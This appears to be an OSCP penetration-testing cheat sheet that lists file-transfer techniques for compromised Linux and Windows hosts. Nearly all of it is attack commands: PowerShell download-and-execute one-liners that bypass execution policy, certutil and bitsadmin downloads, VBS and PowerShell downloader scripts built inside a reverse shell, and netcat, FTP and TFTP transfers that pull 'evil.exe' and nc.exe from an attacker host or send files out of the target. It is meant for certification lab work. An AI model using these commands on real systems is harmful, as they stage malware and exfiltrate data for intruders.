OSCP
Search…
My Checklist
1
smbser.py a path
2
copy \\ip\a\exploit.exe
3
4
Linux Transfer
5
6
wget http://IP_ADDR/file -O /path/to/where/you/want/file/to/go
7
8
curl http://IP_ADDR/file
9
10
fetch http://IP_ADDR/file
11
12
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
13
14
ftp -s:input.txt
15
16
tftp -i get file /path/on/victim
17
18
19
20
Windows Transfer
21
22
bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+)
23
24
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
25
26
ftp -s:input.txt
27
28
tftp -i get file /path/on/victim
29
30
powershell.exe -exec bypass -Command “& {iex((New-Object System.Net.WebClient).DownloadFile(‘http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}”
31
32
certutil -urlcache -split -f “http://IP_ADDR/FILE" FILENAME
33
34
smbserver
35
36
smbserver.py a ~/oscp
37
38
Powershell script
39
40
echo $storageDir = $pwd > wget.ps1
41
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
42
echo $url = “http://IP_ADDR/FILE" >> wget.ps1
43
echo $file = “FILE” >> wget.ps1
44
echo $webclient.DownloadFile($url,$file) >> wget.ps1
45
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>
46
47
48
49
VBS
50
# In reverse shell
51
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
52
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
53
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
54
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
55
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
56
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
57
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
58
echo Err.Clear >> wget.vbs
59
echo Set http = Nothing >> wget.vbs
60
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
61
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
62
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
63
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
64
echo http.Open "GET",strURL,False >> wget.vbs
65
echo http.Send >> wget.vbs
66
echo varByteArray = http.ResponseBody >> wget.vbs
67
echo Set http = Nothing >> wget.vbs
68
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
69
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
70
echo strData = "" >> wget.vbs
71
echo strBuffer = "" >> wget.vbs
72
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
73
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
74
echo Next >> wget.vbs
75
echo ts.Close >> wget.vbs
76
77
# Execute
78
cscript wget.vbs http://10.10.10.10/file.exe file.exe
79
80
HTTP
81
# In Kali
82
python -m SimpleHTTPServer 80
83
84
# In reverse shell - Linux
85
wget 10.10.10.10/file
86
87
# In reverse shell - Windows
88
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
89
90
91
#linux
92
python -m SimpleHTTPServer 9999
93
94
95
#wget
96
wget 192.168.1.102:9999/file.txt
97
98
#curl
99
curl -O http://192.168.0.101/file.txt
100
101
#ncat
102
#attacking machine
103
nc -lvp 4444 < file
104
105
#target machine
106
nc 192.168.1.102 4444 > file
107
108
109
#php
110
echo "<?php file_put_contents('nameOfFile', fopen('http://ip/file', 'r')); ?>" > down2.php
111
112
113
#tftp
114
$ tftp 192.168.0.101
115
tftp> get myfile.txt
116
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
117
118
119
#scp
120
# Copy a file:
121
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
122
123
# Copy a directory:
124
scp -r /path/to/source/dir [email protected]:/path/to/destination
125
126
127
#python
128
Python SimpleHTTPServer
129
130
#on Attacker
131
python -m SimpleHTTPServer
132
133
#on target
134
wget <attackerip>:8000/filename
135
136
137
------------------------------
138
139
Apache
140
141
#on Attacker
142
cp filetosend.txt /var/www/html
143
service apache2 start
144
145
#on target
146
wget http://attackerip/file
147
curl http://attackerip/file > file
148
fetch http://attackerip/file # on BSD
149
150
----------------------------------
151
152
Netcat (From Target to Kali)
153
154
# Listen on Kali
155
nc -lvp 4444 > file
156
157
# Send from Target machine
158
nc <kali_ip> 4444 < file
159
160
-----------------
161
162
163
Netcat (From Kali to Target)
164
165
# on target, wait for the file
166
nc -nvlp 55555 > file
167
168
# on kali, push the file
169
nc $victimip 55555 < file
170
171
172
----------------------
173
174
Extra:
175
To send the executable file to your machine:
176
177
base64 executable
178
# copy the output
179
# paste it in a file called file.txt
180
# decode it and create the executable
181
base64 -d file.txt > executable
182
183
184
185
186
187
#windows
188
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
189
https://blog.netspi.com/15-ways-to-download-a-file/
190
191
certutil -urlcache -f http://ip/1.exe 1.exe
192
193
194
#Powershell
195
echo $storageDir = $pwd > wget.ps1
196
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
197
echo $url = "http://10.10.10.10/file.exe" >>wget.ps1
198
echo $file = "output-file.exe" >>wget.ps1
199
echo $webclient.DownloadFile($url,$file) >>wget.ps1
200
201
202
#VBS
203
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
204
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
205
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
206
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
207
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
208
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
209
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
210
echo Err.Clear >> wget.vbs
211
echo Set http = Nothing >> wget.vbs
212
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
213
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
214
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
215
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
216
echo http.Open "GET", strURL, False >> wget.vbs
217
echo http.Send >> wget.vbs
218
echo varByteArray = http.ResponseBody >> wget.vbs
219
echo Set http = Nothing >> wget.vbs
220
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
221
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
222
echo strData = "" >> wget.vbs
223
echo strBuffer = "" >> wget.vbs
224
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
225
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
226
echo Next >> wget.vbs
227
echo ts.Close >> wget.vbs
228
229
cscript wget.vbs http://attackerip/evil.exe evil.exe
230
231
#powershell
232
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
233
powershell -c "Invoke-WebRequest -Uri http://10.10.14.23/bfill.exe -OutFile C:\Users\kostas\Desktop\bfill.exe"
234
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"
235
236
237
238
#FTP
239
echo open 192.168.1.101 21> ftp.txt
240
echo USER asshat>> ftp.txt
241
echo mysecretpassword>> ftp.txt
242
echo bin>> ftp.txt
243
echo GET wget.exe>> ftp.txt
244
echo bye>> ftp.txt
245
246
ftp -v -n -s:ftp.txt
247
248
#debug
249
wine exe2bat.exe nc.exe nc.txt
250
251
252
253
254
--------------------------------------
255
TFTP
256
# Windows XP and Win 2003 contain tftp client. Windows 7 do not by default
257
# tfpt clients are usually non-interactive, so they could work through an obtained shell
258
259
atftpd --daemon --port 69 /tftp
260
Windows> tftp -i ip GET nc.exe
261
262
--------------------------------------
263
264
FTP (pyftpdlib client on Kali)
265
# Ftp is generally installed on Windows machines
266
# To make it interactive, use -s option
267
268
# On Kali install a ftp client and set a username/password
269
apt-get install python-pyftpdlib
270
python -m pyftpdlib -p 21
271
272
# on Windows
273
ftp <attackerip>
274
> binary
275
> get exploit.exe
276
277
-------------------------------------------
278
279
FTP (pureftpd client on Kali)
280
281
# on Kali
282
283
# install ftp client
284
apt-get install pure-ftpd
285
286
# create a group
287
groupadd ftpgroup
288
289
# add a user
290
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
291
292
# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
293
mkdir /root/ftphome
294
295
# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
296
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
297
298
# Update the ftp database after adding our new user.
299
pure-pw mkdb
300
301
# change ownership of the specified ftp directory (and all it's sub-direcotries)
302
chown -R ftpuser:ftpgroup /root/ftphome
303
304
# restart Pure-FTPD
305
/etc/init.d/pure-ftpd restart
306
307
308
# On Windows
309
echo open <attackerip> 21> ftp.txt
310
echo USER username password >> ftp.txt
311
echo bin >> ftp.txt
312
echo GET evil.exe >> ftp.txt
313
echo bye >> ftp.txt
314
ftp -s:ftp.txt
315
316
--------------------------------------
317
318
Powershell
319
echo $storageDir = $pwd > wget.ps1
320
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
321
echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
322
echo $file = "powerup.ps1" >>wget.ps1
323
echo $webclient.DownloadFile($url,$file) >>wget.ps1
324
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
325
326
--------------------------------------
327
# Powershell download a file
328
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"
329
Copied!
Copy link